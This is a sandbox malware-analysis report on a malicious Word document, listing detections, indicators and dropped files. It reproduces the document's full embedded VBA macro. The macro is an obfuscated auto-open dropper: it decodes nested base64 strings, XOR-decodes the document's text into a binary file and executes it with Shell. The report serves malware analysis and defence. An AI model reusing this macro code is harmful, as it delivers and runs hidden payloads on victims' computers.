3135956e280e61d44f42928899dcb3b0105fb35b53b33f85eaa41bc0ad879d83.doc
This report is generated from a file or URL submitted to this webservice on July 20th 2017 22:02:55 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v6.80 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Contains a remote desktop related string
Indicators
-
Malicious Indicators 4
-
External Systems
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 24/59 Antivirus vendors marked sample as malicious (40% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 24/59 Antivirus vendors marked sample as malicious (40% detection rate)
- source
- External System
- relevance
- 8/10
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
-
Found keyword "Workbook_Open" which indicates: "Runs when the Excel Workbook is opened"
Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened" - source
- Static Parser
- relevance
- 10/10
-
Suspicious Indicators 2
-
Remote Access Related
-
Contains a remote desktop related string
- details
- "fV;"[Q\hqJ]-vDms'vncS>[Fb..\.;5FO7Ks})!1R" (Indicator for product: Generic VNC)
- source
- File/Memory
- relevance
- 10/10
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
Found suspicious keyword "MkDir" which indicates: "May create a directory"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Environ" which indicates: "May read system environment variables"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Open" which indicates: "May open a file" - source
- Static Parser
- relevance
- 10/10
-
Informative 16
-
Environment Awareness
-
Reads the active computer name
- details
- "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source
- Registry Access
- relevance
- 5/10
-
Reads the cryptographic machine GUID
- details
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
-
Reads the registry for installed applications
- details
- source
- Registry Access
- relevance
- 10/10
-
General
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "VBA/ThisDocument") has code: ""
File "NewMacros.bas" (Streampath: "VBA/NewMacros") has code: "Option Explicit
Private Const ReichMarkOneMask = 16515072
Private Const ReichMarkTwoMask = 258048
Private Const ReichMarkThreeMask = 4032
Private Const ReichMarkFourMask = 63
Private Const ReichMarkHighMask = 16711680
Private Const ReichMarkMidMask = 65280
Private Const ReichMarkLowMask = 255
Private Const IDontKNowAnyT1hng18 = 262144
Private Const IDontKNowAnyT1hng12 = 4096
Private Const IDontKNowAnyT1hng6 = 64
Private Const IDontKNowAnyT1hng8 = 256
Private Const IDontKNowAnyT1hng16 = 65536
Public Function \xe6(TakeMeHomeless As String) As String
Dim Okurdebele() As Byte, bIn() As Byte, JohnyBeGut(255) As Byte, LouiseXaEr(63) As Long, SoutherShet(63) As Long
Dim MorgulTirit(63) As Long, lQuad As Long, iPad As Integer, Jebaugopjes As Long, MnUhsj As Long, sOut As String
Dim ROhanKurba As Long
TakeMeHomeless = Replace(TakeMeHomeless, vbCr, vbNullString)
TakeMeHomeless = Replace(TakeMeHomeless, vbLf, vbNullString)
ROhanKurba = Len(TakeMeHomeless) Mod 4
If InStrRev(TakeMeHomeless, "=" + Chr(61)) Then
iPad = 2
ElseIf InStrRev(TakeMeHomeless, "" + Chr(61)) Then
iPad = 1
End If
For ROhanKurba = 0 To 255
Select Case ROhanKurba
Case 65 To 90
JohnyBeGut(ROhanKurba) = ROhanKurba - 65
Case 97 To 122
JohnyBeGut(ROhanKurba) = ROhanKurba - 71
Case 48 To 57
JohnyBeGut(ROhanKurba) = ROhanKurba + 4
Case 43
JohnyBeGut(ROhanKurba) = 62
Case 47
JohnyBeGut(ROhanKurba) = 63
End Select
Next ROhanKurba
For ROhanKurba = 0 To 63
LouiseXaEr(ROhanKurba) = ROhanKurba * IDontKNowAnyT1hng6
SoutherShet(ROhanKurba) = ROhanKurba * IDontKNowAnyT1hng12
MorgulTirit(ROhanKurba) = ROhanKurba * IDontKNowAnyT1hng18
Next ROhanKurba
bIn = StrConv(TakeMeHomeless, vbFromUnicode)
ReDim Okurdebele((((UBound(bIn) + 1) \ 4) * 3) - 1)
For Jebaugopjes = 0 To UBound(bIn) Step 4
lQuad = MorgulTirit(JohnyBeGut(bIn(Jebaugopjes))) + SoutherShet(JohnyBeGut(bIn(Jebaugopjes + 1))) + _
LouiseXaEr(JohnyBeGut(bIn(Jebaugopjes + 2))) + JohnyBeGut(bIn(Jebaugopjes + 3))
ROhanKurba = lQuad And ReichMarkHighMask
Okurdebele(MnUhsj) = ROhanKurba \ IDontKNowAnyT1hng16
ROhanKurba = lQuad And ReichMarkMidMask
Okurdebele(MnUhsj + 1) = ROhanKurba \ IDontKNowAnyT1hng8
Okurdebele(MnUhsj + 2) = lQuad And ReichMarkLowMask
MnUhsj = MnUhsj + 3
Next Jebaugopjes
sOut = StrConv(Okurdebele, vbUnicode)
If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
\xe6 = sOut
End Function
Sub Angel()
homonto
End Sub
Sub S1(b As String)
MkDir (b)
End Sub
Sub S2(b As String)
ChDir (b)
End Sub
Sub homonto()
Dim THISMODETWO665216658 As Integer
Dim THISMODEONE230694511 As Integer
Dim THISMODETRZY735394829 As String
Dim THISMODETRZY73539482999 As String
Dim THISMODEONE287249137 As String
Dim THISMODETRZY518630255 As Integer
Dim THISMODETRZY51863025599 As Integer
Dim THISMODETWO862915273 As Paragraph
Dim THISMODETWO221593696 As Long
Dim THISMODETWO594230832 As Boolean
Dim THISMODETWO813299167 As Integer
Dim THISMODETRZY7353948291 As String
Dim THISMODETRZY735394829199 As String
Dim THISMODETWO184374399 As Byte
Dim THISMODETWO18437439999 As Byte
Dim THISMODEONE659174884 As String
Dim THISMODETWO446599250 As String
THISMODETWO446599250 = \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) _
+ \xe6(\xe6(\xe6(\xe6(\xe6("VmtFOVBRPT0="))) + \xe6(\xe6(\xe6("Vm14SlBRPT0="))) + \xe6(\xe6(\xe6(\xe6("VmxFOVBRPT0="))) + \xe6(\xe6(\xe6("VFZFOVBRPT0="))) + \xe6(\xe6(\xe6(\xe6("VmpJMFBRPT0="))) + \xe6(\xe6(\xe6("VTJzMVYySklRbEZXYlhSWFV6RmtSMkpJVG1oU2F6VnZWVzE0ZDFOV2NGWmFSV1JZVW10c00xWXlkRzg9"))) _
+ \xe6(\xe6(\xe6("VmpKS1dXRkVUbHBXWnowOQ=="))) + \xe6(\xe6(\xe6("VjIxMFV3PT0="))) + \xe6(\xe6(\xe6("WVhwR1ZsWlhlR3RoVVQwOQ=="))) + \xe6(\xe6(\xe6("VlcxMGQxTldaRmxqUlhSVlRXc3hORmRyYUZkV01rcFdWMnhTV21GM1BUMD0="))) + \xe6(\xe6(\xe6("WVVWT2EwMVdjRmxVVlZKSFZXc3hSVlpzYUZkTmFsWlFWMVphUzFKc1RuTldiRlpYWWtoQ2IxWlVRbUU9"))) + \xe6(\xe6(\xe6("V1ZkU1NGWnJaR0ZTYkZwd1ZXeG9RMU5zWkZWVWJscHJUVlZLVTFWR1VYZFFVVDA5"))))))) + Chr(61))))))))
THISMODEONE659174884 = \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) + \xe6(\xe6(\xe6(\xe6("VkZaa2QxVkdXVDA9"))) + \xe6(\xe6(\xe6("WVRCd1ZGWlZXbEprZHowOQ==")))) _
+ Chr(61)))) + \xe6(\xe6(\xe6(\xe6(\xe6(\xe6("VmpGa05GVXhSWGROU0docVVteHZQUT09"))) + \xe6(\xe6(\xe6("VmpGYVJsZHNVbFZXYkhBelZqSjRjMVpzWkhSU2JHaFRZVEozTVZkV1ZtRmpNVmw1VW01S1ZHSnJjRlpaVkVaM1lVWldjVk5yZEZOTlZuQjY="))) _
+ \xe6(\xe6(\xe6(\xe6("Vm14amVHTXhXWGc9"))) + \xe6(\xe6(\xe6("VTFod2FGSnVRbGhVVm1SU1pIYzlQUT09"))) + \xe6(\xe6(\xe6("VjFaU1FrMVdTbkpOVmxwaFVqTkNWRmxuUFQwPQ=="))) + \xe6(\xe6(\xe6("VTBWS2RsWnNaRFJoTVZWNFdrVmtWbUpHY0ZkWlZFcFRWMVphZEU1VlRsZE5WbkJaV2tWVk5WZEhTa2RqUVQwOQ=="))) + \xe6(\xe6(\xe6("WlZacmQxZHRPVmROUkVaWldWVm9TMVl3TVhWaFIwWmhWbnBHU0ZWdFl6az0="))) + \xe6(\xe6(\xe6("VUZFOVBRPT0=")))) _
+ \xe6(\xe6(\xe6(\xe6("VjJjOVBRPT0="))) + \xe6(\xe6(\xe6("VmxkU1NGWlVSbHBsUVQwOQ=="))) + \xe6(\xe6(\xe6("VlRKNGMxWXhXa1pYYmtrOQ=="))) + \xe6(\xe6(\xe6("Vm10U1IxTnRWa2hVYTFwb1VqSjNQUT09"))) + \xe6(\xe6(\xe6("VlRKR05sWnVXbGRTYkVwRVZYcEdUbVZHWkhWU2JFNXBWbFp3ZGxaR1pEUlpWVEZIVjI1U2F3PT0="))) + \xe6(\xe6(\xe6("VWpOU1lWWnRkSGROUmxwWVpVWk9XR0pWY0ZwV1JtaHZWMmM5UFE9PQ=="))) + \xe6(\xe6(\xe6("Vm14YWQxZEdjRVphUm1SVVZtMDRPUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("VldwT1ExWkdiSEpYYmxrOQ=="))) + \xe6(\xe6(\xe6("V2tSR2EyTnNXblJQVjJjOQ=="))) + \xe6(\xe6(\xe6("VkZaYVIwNVdWWGxrUjNSb1lrVTFTbFZYZHowPQ=="))) + \xe6(\xe6(\xe6("WVVaV1YwMHdTa2xXVkVKaFdWZE9WMUpzYkdoU2JWSlBXVmh3VjFOV1dYbGtSMFpYVFZFOVBRPT0="))) + \xe6(\xe6(\xe6("VjFoc1ZHRXlVbkZWYlRFMFYxWmFkR1ZIUm1waVJuQjRWVEp6TlZZd01WWmpTSEJYWWxSR2RsbHJaRWRqYkVwVlZsUXdQUT09"))))))))))))))
Dim vEnd669820757 As String
THISMODEONE287249137 = Environ(\xe6(\xe6(\xe6(\xe6(Chr(86) _
+ \xe6(\xe6(\xe6(\xe6(\xe6("VjFkMFlXUXlSa2M9"))) + \xe6(\xe6(\xe6("VjI1R1VsWkZXbFJVVmxwaFpXeGtjbGRuUFQwPQ=="))) + \xe6(\xe6(\xe6("WWpKR1YxTllhRlJpUjFKWlZtMTRTMU5CUFQwPQ=="))) + \xe6(\xe6(\xe6("VjJ0U1IxZHRWa2hUYTJ4VVlrZFNXQT09"))) _
+ \xe6(\xe6(\xe6("Vld4YWQxZEdaRmhrUjBaclRWZFNXRmxSUFQwPQ=="))) + \xe6(\xe6(\xe6("VFROQ2NWVnRNVk5XTVZKV1ZXdGtWMDFXU1QwPQ=="))) + \xe6(\xe6(\xe6("WXpGa2RHUkdjRmRpU0VKWlZtcEplRkl4V25OVGJrcFhWa1phVjFWdGRGWk9VVDA5"))))) _
+ Chr(61)))))) + \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) _
+ \xe6(\xe6(\xe6(\xe6("VkZFOVBRPT0="))) + \xe6(\xe6(\xe6("VmpOQ1VWWnRkRXM9"))) + \xe6(\xe6(\xe6("VlRGV1IxVllZejA9")))) + Chr(61)))) _
+ \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6("Vm1wR2EwNUdWVDA9"))) + \xe6(\xe6(\xe6("VFZWV00xUnNWbXRoYkVwWFYyYzlQUT09"))) + \xe6(\xe6(\xe6("Vmtac1ZWSnVaR3BOVmxvd1ZGWmFUMWRIU2tobFJtUlhUV3BCTVZsVldscGtNazVHV2tad1RsSnVRalpXYWtKaFdWZE5lRlJ1U214U2JrSnZXVlJHZDJJeFduUmpSWFJVVFZWck9RPT0=")))) _
+ \xe6(\xe6(\xe6(\xe6("VkZFOVBRPT0="))) + \xe6(\xe6(\xe6("Vm01Q05sWm5QVDA9"))) + \xe6(\xe6(\xe6("Vm5wR2VsWnFSa3BsYlVVOQ=="))) + \xe6(\xe6(\xe6("VW01Q1dGbG5QVDA9"))) + \xe6(\xe6(\xe6("VmtWSmVsZG5QVDA9"))) + \xe6(\xe6(\xe6("VmxaVmVGVXdXbUZqTVc4OQ=="))) + \xe6(\xe6(\xe6("VWpCYVZWVnNhRU5YUm1SWVpFWmFUbFp0VVQwPQ=="))) _
+ \xe6(\xe6(\xe6(\xe6("VldjOVBRPT0="))) + \xe6(\xe6(\xe6("VFZaYWVsbFZaREJXUmtsNA=="))) + \xe6(\xe6(\xe6("VTJ4YVYySlVRWGhWVkVaYVpVWmtXV0pGT1ZkV1IzaGFWMWQwWVdReVZuTmhNMk05"))) + \xe6(\xe6(\xe6("VmpJMFBRPT0="))) + \xe6(\xe6(\xe6("Vkd4a1RnPT0="))) + \xe6(\xe6(\xe6("Vm0xM01sWnNZekZaVmxsM1RWaFdhRkl3V1QwPQ=="))) + \xe6(\xe6(\xe6("V1ZaYU5sSnJhRlpOUjFKSVZUQmFTMk14VW5SaVJsSlRWbGhDVEZadGNFZFZiRUpTVUZFOVBRPT0="))) + \xe6(\xe6(\xe6("VUZFOVBRPT0="))))) _
+ \xe6(\xe6(\xe6("VTFob1ZVMVZiRFZXUjNSdllVWkplV0ZJVGxwaE1YQXlWRlphWVdSQlBUMD0="))) + \xe6(\xe6(\xe6("VkZaU1UxWXdNVmc9"))) + \xe6(\xe6(\xe6("WlVab1YwMVhhSFpXTUdSTFVqSk9SazlXWkdsU2JrRTk="))) + \xe6(\xe6(\xe6("WVVac2NWSnVaRmhTTURROQ=="))) + \xe6(\xe6(\xe6("VW14T2MxRnNXbGRTUlVVeA==")))))))))))))
If Len(dir(THISMODEONE287249137, vbDirectory)) = 0 Then
S1 (THISMODEONE287249137)
Else:
Wipedir (THISMODEONE287249137)
S1 (THISMODEONE287249137)
End If
THISMODETRZY735394829 = \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) + \xe6(\xe6(\xe6(\xe6(\xe6("VmtFOVBRPT0="))) + \xe6(\xe6(\xe6("Vm1jOVBRPT0="))) _
+ \xe6(\xe6(\xe6("V2toa1ZsSm5QVDA9"))) + \xe6(\xe6(\xe6("VjJjOVBRPT0="))) + \xe6(\xe6(\xe6("WTJjOVBRPT0="))) + \xe6(\xe6(\xe6("VlRKM1BRPT0="))) + \xe6(\xe6(\xe6("Vkd4WlBRPT0="))) + \xe6(\xe6(\xe6("VldjOVBRPT0="))) + \xe6(\xe6(\xe6("WWtFOVBRPT0="))) + \xe6(\xe6(\xe6("VW1wTlBRPT0="))))) _
+ Chr(61)))) + \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6("Vm1jOVBRPT0="))) + \xe6(\xe6(\xe6("VFZkUlBRPT0="))) + \xe6(\xe6(\xe6("VGtkSlBRPT0="))) + \xe6(\xe6(\xe6("VFZWV05BPT0="))) + \xe6(\xe6(\xe6("VmtkMGF3PT0="))) + \xe6(\xe6(\xe6("WVZaS2MxZHNUbGRoZHowOQ=="))) + \xe6(\xe6(\xe6("Vm0xR1Z3PT0="))) + \xe6(\xe6(\xe6("Vm14YU1Ga3pjRWRYUjBwSVpIb3dQUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0xNGF3PT0="))) + \xe6(\xe6(\xe6("WkVaS2RHRkdaRTVUUlVwSlZqRlNRMWxYU1hoYVJXTTk="))) + \xe6(\xe6(\xe6("VmpGb2QxWnRTbkpqUm1oWFlURmFNdz09"))) + \xe6(\xe6(\xe6("VmxWWlBRPT0="))) + \xe6(\xe6(\xe6("VjI1R1UySlZXbkpXYlhoaFpWWlJQUT09"))) + \xe6(\xe6(\xe6("WWtad2NsWlJQVDA9"))) + \xe6(\xe6(\xe6("VFd0V05sVlJQVDA9"))) + \xe6(\xe6(\xe6("WVdzMVdGbFVSbmM9"))) + \xe6(\xe6(\xe6("WVVaa1VsQlJQVDA9"))) + \xe6(\xe6(\xe6("VUZFOVBRPT0=")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0weE5GZFdXblJrUjNSWVVuYzlQUT09"))) + \xe6(\xe6(\xe6("VWxoc2FBPT0="))) + \xe6(\xe6(\xe6("VWxSc1dGUlZZejA9"))) + \xe6(\xe6(\xe6("Vld4UlBRPT0="))) + \xe6(\xe6(\xe6("Vm0xdlBRPT0="))) + \xe6(\xe6(\xe6("VW14alBRPT0="))) + \xe6(\xe6(\xe6("V2tWalBRPT0="))) + \xe6(\xe6(\xe6("Vm1jOVBRPT0="))) + \xe6(\xe6(\xe6("VTBaSlBRPT0="))) + \xe6(\xe6(\xe6("WWtkU2NGVm5QVDA9"))) + \xe6(\xe6(\xe6("WVROQ1dWWnRkejA9"))) + \xe6(\xe6(\xe6("V1hwR1ZFMVJQVDA9"))) + \xe6(\xe6(\xe6("Vm1jOVBRPT0="))) + \xe6(\xe6(\xe6("VmpGWlBRPT0="))) + \xe6(\xe6(\xe6("WWtaYVQxVnJaSG89"))) + \xe6(\xe6(\xe6("VUZFOVBRPT0=")))) + Chr(61))))))))))
ChDrive (THISMODEONE287249137)
S2 (THISMODEONE287249137)
THISMODETRZY518630255 = FreeFile()
Open THISMODETRZY735394829 For Binary As THISMODETRZY518630255
THISMODEONE230694511 = 0
For Each THISMODETWO862915273 In ActiveDocument.Paragraphs
DoEvents
THISMODETRZY7353948291 = THISMODETWO862915273.Range.Text
THISMODETWO221593696 = 1
THISMODEONE230694511 = THISMODEONE230694511 + 1
If THISMODEONE230694511 >= 24 Then
While (THISMODETWO221593696 < Len(THISMODETRZY7353948291))
THISMODETWO184374399 = THISMODETWO446599250 & Mid(THISMODETRZY7353948291, THISMODETWO221593696, 2)
THISMODETWO184374399 = THISMODETWO184374399 Xor &H33
Put #THISMODETRZY518630255, , THISMODETWO184374399
THISMODETWO221593696 = THISMODETWO221593696 + 2
Wend
End If
Next
Close #THISMODETRZY518630255
THISMODETRZY7353948293 (THISMODETRZY735394829)
End Sub
Public Sub Wipedir(okokok As String)
Dim OOO
Set OOO = CreateObject(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) _
+ Chr(109) + \xe6(\xe6(\xe6(\xe6("VkZaa2QxVkdXbkpUVkRBOQ==")))) + \xe6(\xe6(\xe6(\xe6("VmxkNFExWlZNVUpRVkRBOQ==")))) + Chr(61)))) _
+ \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6("Vm1wR2EwNUhTWGxUVVQwOQ=="))) + \xe6(\xe6(\xe6("WlVaa2NscEdaR2hpU0VKVlYxZDBWMlF5VFhoWGJsRTk="))) + \xe6(\xe6(\xe6("V2xWb2EySkhTVDA9"))) + \xe6(\xe6(\xe6("VWpOak9RPT0=")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0xNGF3PT0="))) + \xe6(\xe6(\xe6("WTJzNVdHRkdaR2hOYm1ONVZqRmFWMWxSUFQwPQ=="))) + \xe6(\xe6(\xe6("VmxSR2ExSXhaSFZWYkZwWVVqRktXRmRuUFQwPQ=="))) + \xe6(\xe6(\xe6("VmpOU00xVjZSbmRXYkdSMFpFZDBWMkpJUVhkWFVUMDk="))) + \xe6(\xe6(\xe6("VFVad1VGbFdXbUZqYlU1RlZsUXdQUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0wd2QyUXlWVDA9"))) + \xe6(\xe6(\xe6("VWxSV1NGWkdhRzlXVjBwSVZXNUdWbUpCUFQwPQ=="))) + \xe6(\xe6(\xe6("VjI1a2FGSnNXbm89"))) + \xe6(\xe6(\xe6("VjJ0YVQyRlZNVmhsU0d4WFlsUldVRlpIYzNoWFFUMDk="))) + \xe6(\xe6(\xe6("V2tWU1QxWXlTbFZXYkVFOQ=="))) + \xe6(\xe6(\xe6("Vm0xd1FtVkhUblJVYTJScVVtMDRPUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm0xNFlXUXhXVDA9"))) + \xe6(\xe6(\xe6("VW14c05WUldWbUZpUmtsM1RsVnZQUT09"))) + \xe6(\xe6(\xe6("VmxSS05GbFhSbGRhUlZwT1ZrWkpQUT09"))) + \xe6(\xe6(\xe6("VmpGYVJsZHRhR0ZTUlZwTFdsWmFTMk50UmtnPQ=="))) + \xe6(\xe6(\xe6("WWtaT2FHVnNXbEZXYkdRd1dWWkpkMDFJYUZoaWJFcFBWbXRGT1ZCUlBUMD0=")))) _
+ \xe6(\xe6(\xe6(\xe6("VmxkM1BRPT0="))) + \xe6(\xe6(\xe6("V2tVMVYwMHlhR0ZXYlhSaFlqSk5lRmRuUFQwPQ=="))) + \xe6(\xe6(\xe6("WkVaS1dXSkhhRk5pU0VKb1ZtMXpQUT09"))) + \xe6(\xe6(\xe6("Vm01a2EySkhkekpWYldNNVVGRTlQUT09")))) _
+ \xe6(\xe6(\xe6(\xe6("Vm1wS1UxSnJOVmRYYkZacFVteHdVQT09"))) + \xe6(\xe6(\xe6("Vm0weE1HUXhZejA9"))) + \xe6(\xe6(\xe6("Vm14d01GUldVbE5YWnowOQ=="))) + \xe6(\xe6(\xe6("Vm0xNFIwNUdXblJsUm1SVg=="))) + \xe6(\xe6(\xe6("WWtWd1JsVldVbkpRVVQwOQ=="))))))) + \xe6(\xe6(\xe6(Chr(86) + \xe6(\xe6(\xe6("VmxadlBRPT0="))) + \xe6(\xe6(\xe6("VW1zNFBRPT0="))) + \xe6(\xe6(\xe6("Vm10S1UxVkdVWGM9"))) + Chr(61)))))))))
If OOO.folderexists(okokok) Then
OOO.deletefolder okokok
Else
End
End If
End Sub
Sub Shits(vbHH As String)
Dim OBsGG
OBsGG = Shell(vbHH, 1)
End Sub
Sub THISMODETRZY7353948293(THISMODETRZY7353948290 As String)
Dim THISMODETWO665216658 As Integer
Dim THISMODEONE287249137 As String
THISMODEONE287249137 = Environ(\xe6(\xe6(\xe6(\xe6(Chr(86) + \xe6(\xe6(\xe6("WWtad2FBPT0="))) + \xe6(\xe6(\xe6("Vm1wQk1RPT0="))) + \xe6(\xe6(\xe6("VWpGV2MxcEdhRmRTUlVVMQ==")))))) _
+ \xe6(\xe6(\xe6(Chr(86) + Chr(109) _
+ \xe6(\xe6(\xe6("VFZFOVBRPT0="))) + \xe6(\xe6(\xe6("WldjOVBRPT0="))) + \xe6(\xe6(\xe6("VkZaYVNtVkdaSE5oUjNoVFZrZDRXRlp0TUQwPQ=="))) + \xe6(\xe6(\xe6("WlVkR2JGWnNSalJXYlRFd1ZqRktjMk5HY0ZwV1ZscHhWVVpGT1E9PQ=="))) + Chr(61)))))) _
+ \xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(\xe6(Chr(86) + Chr(109) _
+ \xe6(\xe6(\xe6("VFZkdlBRPT0="))) + \xe6(\xe6(\xe6("VkRGYVExVnNRbFZOUVQwOQ=="))) + Chr(61)))) + \xe6(\xe6(\xe6(\xe6(\xe6(\xe6("VmpGa05GVXhSWGRPVldScVVsRTlQUT09"))) + \xe6(\xe6(\xe6("Vm14T2FFMVlRbnBXVnpBOQ=="))) + \xe6(\xe6(\xe6("VFZaT1dHSkhlRmRXTWpBMVlVWlpkdz09"))) _
+ \xe6(\xe6(\xe6("WTBWalBRPT0="))) + \xe6(\xe6(\xe6("VjFSQ1lXTXhaRWRYYms1VVlUTm9ZVmxYZEdGaFJscHhVMnQwVTAxUlBUMD0="))) + \xe6(\xe6(\xe6("VjI1T1ZtSlhkejA9"))) + \xe6(\xe6(\xe6("VmpGSmVtRkdjRmRpVkVJeldsVlZQUT09"))) + \xe6(\xe6(\xe6("VGxWb1YySkhVbWhWTUZaM1ZuYzlQUT09"))) + \xe6(\xe6(\xe6("VjFkMFZrMVdaRWRWYkdoclUwZFNWVlp0TlVOV01WbDVUbEU5UFE9PQ=="))) _
+ \xe6(\xe6(\xe6("VkRGa2N3PT0="))) + \xe6(\xe6(\xe6("VjI1TlBRPT0="))) + \xe6(\xe6(\xe6("V1RCYWMxWXhXVDA9"))) + \xe6(\xe6(\xe6("VFRGS01sWnFTalJYYlZaMFVtdG9hQT09"))) + \xe6(\xe6(\xe6("VWpCYVZGbHJhRU5UVm1SVlUxaG9WUT09"))) + \xe6(\xe6(\xe6("VFZWc05WWkhkRzloUmtsNVlVaE9XbUV4Y0RKVVZsazk="))) + \xe6(\xe6(\xe6("VjI1U1RsWkdTbGhVVm1RMFYwWlplR0ZIT0QwPQ=="))) _
+ \xe6(\xe6(\xe6("Vm5jOVBRPT0="))) + \xe6(\xe6(\xe6("VWpCd1NGbDNQVDA9"))) + \xe6(\xe6(\xe6("VWxSc1dGbHJXbmRoUm14eFVtNWtXRkl3TlVkVk1uYzk="))) + \xe6(\xe6(\xe6("VVd4YVYxSkZSVEU9")))))))))))))
ChDrive (THISMODEONE287249137)
S2 (THISMODEONE287249137)
Shits (THISMODEONE287249137 + \xe6(\xe6(\xe6(\xe6(Chr(86) _
+ \xe6(\xe6(\xe6("WVdjOVBRPT0="))) + \xe6(\xe6(\xe6("VVd4a2FBPT0="))) + \xe6(\xe6(\xe6("WWxaYVNWWnROVXRpUmswOQ=="))) + \xe6(\xe6(\xe6("VW10d1dWZFJQVDA9"))) + \xe6(\xe6(\xe6("VmpOb1RGbFZXbUZXTVZaWldrWkdWZz09"))) + \xe6(\xe6(\xe6("VmtSQk5RPT0=")))))) + \xe6(\xe6(\xe6(Chr(86) _
+ \xe6(\xe6(\xe6("Vmxad1IxUXhXa05WYkVKVlRVRTlQUT09"))) + Chr(61))))))
End Sub
Sub AutoOpen()
Angel
End Sub
Private Sub Workbook_Open()
Angel
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\msoF72F.tmp"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
- source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 69210000
- source
- Loaded Module
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "OfficeTooltip" - source
- API Call
- relevance
- 10/10
-
Installation/Persistence
-
Dropped files
- details
-
"c93ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Jul 20 20:04:29 2017 mtime=Thu Jul 20 20:04:29 2017 atime=Thu Jul 20 20:04:35 2017 length=753571 window=hide"
"~$3ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.doc" has type "data"
"msoF72F.tmp" has type "GIF image data version 89a 15 x 15"
"index.dat" has type "data"
"~WRS{E05C6FEE-AB1B-4EC4-BEC2-62F2BFCBAA59}.tmp" has type "data"
"~WRS{7E8CC096-A89B-4BC4-BC24-67EEADE93A4E}.tmp" has type "FoxPro FPT blocks size 25600 next free block index 1140850688"
"~WRD0001.tmp" has type "Microsoft Word 2007+"
"~WRS{B5BB78FE-9788-442F-B0CC-7A91197C7A2F}.tmp" has type "data"
"~WRS{9A69F611-DBEE-4B09-9F46-93EB686093F6}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"MSO1045.acl" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
- source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
- source
- File/Memory
- relevance
- 10/10
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
- "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
- source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
- source
- Registry Access
- relevance
- 3/10
-
File Details
3135956e280e61d44f42928899dcb3b0105fb35b53b33f85eaa41bc0ad879d83.doc
- Filename
